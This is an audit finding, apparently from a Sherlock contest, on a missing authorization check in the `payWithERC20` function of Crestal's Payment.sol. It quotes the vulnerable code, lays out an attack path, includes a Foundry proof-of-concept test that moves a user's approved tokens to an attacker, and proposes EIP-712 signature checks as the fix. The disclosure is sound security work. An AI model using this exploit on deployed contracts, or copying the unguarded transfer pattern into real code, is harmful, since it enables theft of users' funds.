Bubbly Ceramic Bison

High

# Unauthorized ERC20 Token Transfers in `payWithERC20`

### Summary



**The lack of authorization checks in `payWithERC20` will cause a complete loss of funds for users as an attacker will transfer tokens from any approved address without permission.**





### Root Cause

In [Payment.sol:25-32](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25C4-L32C6) the `payWithERC20` function is public and lacks any authorization mechanisms, allowing any caller to transfer tokens from any address that has approved the contract.

```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
    // check from and to address
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```

### Internal Pre-conditions

1. Any user must have approved the contract to spend their ERC20 tokens
2. The amount to be transferred must be greater than 0
3. The `fromAddress` and `toAddress` must be different addresses
4. The `toAddress` must not be the zero address


### External Pre-conditions

1. ERC20 tokens used with this contract must follow standard ERC20 implementation with `transferFrom` functionality


### Attack Path

1. User A approves the contract to spend their tokens through the standard ERC20 `approve` function
2. Attacker calls `payWithERC20` with User A's address as the `fromAddress`, their own address as the `toAddress`, and any arbitrary amount up to the approved amount
3. The tokens are transferred from User A to the attacker with no authorization checks



### Impact

Users who have approved the Crestal contract will suffer complete loss of their approved tokens. The attacker gains the full amount of tokens they transfer from victims.


### PoC

```solidity
// SPDX-License-Identifier: GPL-3.0-or-later
pragma solidity >=0.8.0;

import "forge-std/Test.sol";
import "../src/Payment.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

contract MockERC20 is ERC20 {
    constructor() ERC20("Mock", "MCK") {
        _mint(msg.sender, 1000000 * 10**18);
    }
}

contract PaymentExploitTest is Test {
    Payment payment;
    MockERC20 token;
    address user = address(0x1);
    address attacker = address(0x2);
    
    function setUp() public {
        payment = new Payment();
        token = new MockERC20();
        
        // Transfer tokens to user
        token.transfer(user, 1000 * 10**18);
        
        // User approves the payment contract to spend tokens
        vm.prank(user);
        token.approve(address(payment), 1000 * 10**18);
    }
    
    function testUnauthorizedTransfer() public {
        // Check initial balances
        assertEq(token.balanceOf(user), 1000 * 10**18);
        assertEq(token.balanceOf(attacker), 0);
        
        // Attacker calls payWithERC20 to steal user's tokens
        vm.prank(attacker);
        payment.payWithERC20(address(token), 500 * 10**18, user, attacker);
        
        // Verify tokens were stolen
        assertEq(token.balanceOf(user), 500 * 10**18);
        assertEq(token.balanceOf(attacker), 500 * 10**18);
    }
}
```

### Mitigation

Implement a proper authorization mechanism for the `payWithERC20` function. Since this function is intended to support gasless transactions, it should use signed messages (EIP-712) to verify that the `fromAddress` has authorized the transfer:

```solidity
function payWithERC20(
    address erc20TokenAddress, 
    uint256 amount, 
    address fromAddress, 
    address toAddress, 
    bytes memory signature
) public {
    // Verify authorization
    bytes32 digest = getTransferDigest(erc20TokenAddress, amount, fromAddress, toAddress);
    address signer = getSignerAddress(digest, signature);
    require(signer == fromAddress, "Unauthorized transfer");
    
    // Perform transfer
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    require(erc20TokenAddress != address(0), "Invalid token address");
    
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```

Alternatively, restrict the function to be called only by trusted addresses (like the forwarding gateway mentioned in the README).